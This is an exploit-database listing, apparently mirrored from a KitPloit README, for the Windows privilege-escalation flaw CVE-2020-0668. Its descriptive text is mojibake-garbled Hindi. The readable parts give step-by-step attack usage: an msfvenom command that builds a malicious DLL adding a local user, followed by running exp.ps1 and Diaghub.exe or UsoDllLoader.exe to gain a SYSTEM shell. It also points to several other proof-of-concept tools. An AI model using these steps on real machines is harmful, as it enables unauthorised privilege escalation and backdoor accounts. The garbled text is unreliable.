Sploitus

Exploit for CVE-2020-0668

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN66 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-YCDXSB-CVE-2020-0668
# CVE-2020-0668

> CVE-2020-0668 рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдХреЛ рд╕рдВрд╕реНрдХрд░рдг < win10 v1903 рдФрд░ рд╕рдВрд╕реНрдХрд░рдг >= win10 v1903 рдХреЗ рд▓рд┐рдП рдХрд╛рдо рдХрд░рдиреЗ рдпреЛрдЧреНрдп рдмрдирд╛рдПрдВ

## Diaghub рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ (< v1903)

powershell рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ Diaghub рдХреЗ рд╕рд╛рде рд╕рдВрд╕реНрдХрд░рдг < win10 v1903 рдкрд░ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИред

### рдЙрдкрдпреЛрдЧ

  * STEP 1я╝Ъmsfvenom рдХреЗ рд╕рд╛рде `evil.dll` рдЬрдирд░реЗрдЯ рдХрд░реЗрдВ 
    * рдЙрджрд╛рд╣рд░рдг рдХреЗ рддреМрд░ рдкрд░ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЬреЛрдбрд╝реЗрдВ я╝Ъ `msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dll`
  * STEP 2я╝Ъpowershell рдХреЗ рд╕рд╛рде `exp.ps1` рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
  * STEP 3я╝Ъdll рд▓реЛрдб рдХрд░рдиреЗ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЬреЛрдбрд╝рдиреЗ рдХреЗ рд▓рд┐рдП `Diaghub.exe C:\ProgramData evil.dll` рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВред



![Diaghub](https://assets.kitploit.com/production/public/readmes/34802/5e16b94fe48370a35794479ca77d364c6adc083bbb2cd7a4888ad9f106880aa4.png)

  * Diaghub



## UsoDllLoader рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ (>= v1903)

powershell рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ UsoDllLoader рдХреЗ рд╕рд╛рде рд╕рдВрд╕реНрдХрд░рдг >= win10 v1903 рдкрд░ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИред

### рдЙрдкрдпреЛрдЧ

  * STEP 1 : powershell рдХреЗ рд╕рд╛рде `exp.ps1` рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
  * STEP 2 : рд╕рд┐рд╕реНрдЯрдо рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП `UsoDllLoader.exe` рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ



![рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ](https://assets.kitploit.com/production/public/readmes/34802/849028168d65e250c97c5bddc8f7313b13afcdcc7308cd5f05709bb08464ed60.png)

  * UsoDllLoader



## рдЕрдиреНрдп Exp рдпрд╛ PoC

### SysTracingPoc Exp

SysTracingPoc рдХрд╛ x86 рд░рд┐рд▓реАрдЬрд╝ рд╕рдВрд╕реНрдХрд░рдг issue рдХреЗ рд▓рд┐рдПя╝МрдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ UsoLoadDll рдХреЗ рдХрд╛рд░рдг рд╕рдВрд╕реНрдХрд░рдг >= win10 v1903 рдкрд░ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИред

  * SysTracingPoc



### RedCursorSecurityConsulting PoC

рдПрдХ .net PoCред рдпрджрд┐ рдЖрдк `C:\Windows\System32\evil.dll` рдХреЛ рджреЗрдЦреЗрдВ рдФрд░ рдЗрд╕реЗ `evil.txt` рдХреЗ рд░реВрдк рдореЗрдВ рдирд╛рдо рдмрджрд▓реЗрдВред

рдЖрдк рдкрд╛рдПрдВрдЧреЗ рдХрд┐ рдпрд╣ dll рдлрд╝рд╛рдЗрд▓ рдирд╣реАрдВ рд╣реИред рдЗрд╕рдореЗрдВ рдХреЗрд╡рд▓ рдЯреНрд░реЗрд╕рд┐рдВрдЧ рд▓реЙрдЧ рд╣реИред

  * CVE-2020-0668



### Nan3r PoC

рдПрдХ powershell PoCред evil.dll рдореЗрдВ рднреА рдХреЗрд╡рд▓ рдЯреНрд░реЗрд╕рд┐рдВрдЧ рд▓реЙрдЧ рд╣реИред

  * CVE-2020-0668